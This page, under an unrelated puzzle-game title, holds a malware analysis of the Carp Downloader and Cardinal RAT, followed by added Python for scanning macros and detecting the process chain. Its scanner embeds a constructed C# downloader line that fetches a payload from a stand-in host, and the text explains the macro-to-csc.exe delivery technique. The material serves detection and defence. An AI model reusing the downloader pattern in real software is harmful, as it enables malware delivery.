areanero.blogg.se

Cardinal chains level 58 walkthrough
Palo Alto Networks has discovered a previously unknown remote access Trojan (RAT) that has been active for over two years. It has a very low volume in this two-year period, totaling roughly 27 samples. The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# (C Sharp) source code into an executable that in turn is run to deploy the Cardinal RAT malware family. These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them.

The malware from start to finish exhibits the following high-level operations, as shown in Figure 1:

Figure 1 Malware execution flow

Carp Downloader

As previously mentioned, we have observed Cardinal RAT being delivered using a unique technique involving malicious Excel macros. We are calling these delivery documents the Carp Downloader, as they make use of a specific technique of compiling and executing embedded C# source code that acts as a simple downloader. We observed the following example macro in the most recent sample. Note that we have prefixed the function names with 'xx_' to make it easier for the reader to follow what is going on. Additionally, we have added comments to explain what is happening, as well as the un-obfuscated strings that are found within the macro.

Figure 2 Portion of malicious macro containing base64-encoded source code

Figure 3 Portion of malicious macro responsible for compiling and executing embedded source code

As a quick recap of what the malicious macro is doing, it begins by generating two paths: a path to a randomly named executable, and a path to a randomly named C# file, both in the %APPDATA%\Microsoft folder. It then base64-decodes the embedded C# source code, as shown in Figure 2, and writes it to the C# file path previously generated. Finally, as shown in Figure 3, it compiles and executes this C# source code using csc.exe, the C# compiler that is built into Microsoft Windows.

The decoded source code in this example is shown in Figure 4.

As we can see, it simply downloads a file from secure.dropinboxpw using HTTP on port 443 (not HTTPS, so the transfer is cleartext despite using the usual TLS port), and proceeds to decrypt the file using AES-128 prior to executing it. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample.

A total of 11 unique Carp Downloader samples have been observed to date. Of course, the Carp Downloader is not required to download Cardinal RAT; however, based on our visibility, it has exclusively done so.

The following figures show lures that we observed in these samples.

Figure 5 Lure with a filename of Top10Binary_Sample_HotLeads_13.9.xls

Figure 6 Lure with a filename of AC_Media_Leads_ReportGenerator_5.2.xls

Figure 8 Lure with a filename of Arabic 22.12_Pre qualified.xls

Figure 10 Lure with a filename of Hot_Leads_Export_09.03_EN.xls

As we can see from the above examples, the majority of these lures are financial-related, describing various fake customer lists for various organizations. Based on the similarities witnessed in some of these lures, it appears that the attackers use some sort of template, where they simply swap specific cells with the pertinent images or information.

The name Cardinal RAT comes from internal names used by the author within the observed Microsoft .NET executables. To date, 27 unique samples of Cardinal RAT have been observed, dating back to December 2015. It is likely that the low volume of samples seen in the wild is partly responsible for the fact that this malware family has remained under the radar for so long.

An unobfuscated copy of Cardinal RAT was identified, which allowed us to view the decompiled class and function names. A subset of these may be seen below in Figure 11. This not only allowed us to easily identify the full functionality of the RAT, but also made it easier to identify and reverse-engineer various aspects of the malware itself.

Figure 11 Decompiled Cardinal RAT classes

When initially executed, the malware will check its current working directory. Should it not match the expected path, Cardinal will enter its installation routine. Cardinal RAT will copy itself to a randomly named executable in the expected directory. It will then compile and execute embedded source code that contains watchdog functionality. Specifically, this newly spawned executable will ensure that the following registry key is set:
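The Carp Downloader recap above (random paths under %APPDATA%\Microsoft, a base64-encoded C# payload, csc.exe compile, Shell execution) is the kind of pattern an analyst checks for after dumping a document's VBA. The script below is an added example and is not code from the write-up, from Palo Alto Networks, or from the Carp Downloader itself. Its SAMPLE_VBA is a constructed macro that mirrors only the structure the write-up describes; the embedded C# stand-in, the example.invalid host, and the xx_RandName, xx_WriteFile and xx_B64Decode helper names are placeholders, not indicators from any real sample.

```python
"""Static triage of a Carp-style Excel macro (added example, not the real macro)."""
import base64
import re
from typing import Dict, List, Optional

# Constructed stand-in for the embedded C# downloader: fetches over plain HTTP on
# port 443 and references AES, as the write-up describes. Not the real source.
_FAKE_CSHARP = """\
using System;
using System.Net;
using System.Security.Cryptography;
class Dl {
    static void Main() {
        var wc = new WebClient();
        byte[] enc = wc.DownloadData("http://example.invalid:443/p.bin");
        using (var aes = new AesManaged()) { /* decrypt, write, execute */ }
    }
}
"""

# Constructed macro text: two random paths under %APPDATA%\Microsoft, a base64
# blob holding C# source, a csc.exe compile and a Shell of the result.
SAMPLE_VBA = (
    'Sub Auto_Open()\n'
    '    Dim exePath As String, csPath As String, src As String\n'
    '    exePath = Environ("APPDATA") & "\\Microsoft\\" & xx_RandName() & ".exe"\n'
    '    csPath = Environ("APPDATA") & "\\Microsoft\\" & xx_RandName() & ".cs"\n'
    '    src = "' + base64.b64encode(_FAKE_CSHARP.encode()).decode() + '"\n'
    '    xx_WriteFile csPath, xx_B64Decode(src)\n'
    '    Shell "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe /out:" '
    '& exePath & " " & csPath, vbHide\n'
    '    Shell exePath, vbHide\n'
    'End Sub\n'
)

# Quoted strings made only of base64 characters and long enough to be a payload.
_B64_STR = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')


def find_base64_blobs(vba: str) -> List[str]:
    """Return candidate base64 payload strings found in macro text."""
    return [m.group(1) for m in _B64_STR.finditer(vba)]


def decode_csharp(blob: str) -> Optional[str]:
    """Decode a blob and keep it only if it looks like C# source."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if re.search(r"\busing\s+System\b", text) and re.search(r"\bclass\s+\w+", text):
        return text
    return None


def triage_macro(vba: str) -> Dict[str, object]:
    """Score macro text against the Carp Downloader pattern."""
    sources = [s for s in map(decode_csharp, find_base64_blobs(vba)) if s]
    joined = "\n".join(sources)
    result: Dict[str, object] = {
        "csc_exe": bool(re.search(r"\bcsc\.exe\b", vba, re.I)),
        "shell_exec": bool(re.search(r"\bShell\b", vba)),
        # %APPDATA%\Microsoft is the drop location the write-up describes.
        "appdata_microsoft": bool(re.search(r"APPDATA.*\\Microsoft\\", vba)),
        "embedded_csharp": len(sources),
        "source_downloads": bool(re.search(r"WebClient|DownloadData|HttpWebRequest", joined)),
        "source_uses_aes": bool(re.search(r"\bAes\w*\b|Cryptography", joined)),
        # Plain http:// to port 443: cleartext on the TLS port, as in the sample.
        "http_on_443": bool(re.search(r'http://[^"\s]+:443\b', joined)),
    }
    result["carp_like"] = bool(
        result["csc_exe"] and result["embedded_csharp"] > 0 and result["appdata_microsoft"]
    )
    result["decoded_sources"] = sources
    return result


if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_VBA).items():
        if key != "decoded_sources":
            print(f"{key}: {value}")
```

The base64 decode is the robust part: the write-up notes the real macro's strings were obfuscated, so the csc.exe and APPDATA regexes can miss a variant that builds those strings at runtime, whereas an embedded C# payload still has to be present somewhere as a long base64 literal unless the author splits it into chunks. Treat a decoded C# source containing a downloader and a crypto class as the primary signal and the string matches as supporting evidence.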
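Both stages described above leave the same footprint in process-creation telemetry: Excel spawning csc.exe to compile a .cs file from %APPDATA%\Microsoft, Excel then launching the freshly compiled executable from that folder, and later the dropped Cardinal executable itself spawning csc.exe to compile its embedded watchdog. The following detection logic is an added example, not from the write-up or either malware family. The events are constructed Sysmon-style process-creation records; the user name, file names and paths are placeholders, and the only assumption about the environment is that %APPDATA% expands to the default ...\AppData\Roaming.

```python
"""Process-creation rules for the Carp / Cardinal chain (added example)."""
import re
from typing import Dict, List

OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# %APPDATA%\Microsoft on a default profile expands to this path suffix.
APPDATA_MS = re.compile(r"\\AppData\\Roaming\\Microsoft\\", re.I)
# A .cs source file under that folder on the csc.exe command line.
APPDATA_CS = re.compile(r"\\AppData\\Roaming\\Microsoft\\[^\s]+\.cs\b", re.I)

# Constructed events. 1-3 are the chain the write-up describes; 4-5 are benign.
EVENTS: List[Dict[str, str]] = [
    {"Id": "1", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /out:C:\Users\u\AppData\Roaming\Microsoft\kq7x.exe "
                    r"C:\Users\u\AppData\Roaming\Microsoft\m3pz.cs"},
    {"Id": "2", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Users\u\AppData\Roaming\Microsoft\kq7x.exe",
     "CommandLine": r"C:\Users\u\AppData\Roaming\Microsoft\kq7x.exe"},
    # Cardinal stage: the dropped executable compiles its watchdog.
    {"Id": "3", "ParentImage": r"C:\Users\u\AppData\Roaming\Microsoft\kq7x.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /out:C:\Users\u\AppData\Roaming\Microsoft\b81r.exe "
                    r"C:\Users\u\AppData\Roaming\Microsoft\b81r.cs"},
    # Benign: a developer build, and Excel spawning the print helper.
    {"Id": "4", "ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r"csc.exe /out:C:\src\app\bin\app.exe C:\src\app\Program.cs"},
    {"Id": "5", "ParentImage": r"C:\Program Files\Microsoft Office\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe", "CommandLine": "splwow64.exe 12288"},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty list if none)."""
    image = _basename(event["Image"])
    parent = _basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    hits: List[str] = []
    if image == "csc.exe":
        # Carp: an Office application driving the C# compiler.
        if parent in OFFICE_IMAGES:
            hits.append("office_spawns_csc")
        # Either stage: compiling a source file dropped in %APPDATA%\Microsoft.
        if APPDATA_CS.search(cmd):
            hits.append("csc_compiles_from_appdata")
        # Cardinal: a non-Office executable living in that folder compiles code.
        if APPDATA_MS.search(event["ParentImage"]) and parent not in OFFICE_IMAGES:
            hits.append("appdata_exe_spawns_csc")
    elif parent in OFFICE_IMAGES and APPDATA_MS.search(event["Image"]):
        # Carp: Excel launching the executable it just compiled.
        hits.append("office_launches_appdata_exe")
    return hits


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map event id to matched rule names, keeping only events that matched."""
    matched: Dict[str, List[str]] = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            matched[event["Id"]] = hits
    return matched


if __name__ == "__main__":
    for event_id, rules in scan(EVENTS).items():
        print(event_id, rules)
```

csc.exe is legitimate on developer hosts and is also invoked by tooling such as PowerShell's Add-Type, so the parent process and the source-file location are the discriminators, not the compiler itself. Because Cardinal copies itself to a new random name whenever its working directory is not the expected path, matching on the folder rather than on a file name is what keeps the third rule stable across reinstalls.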








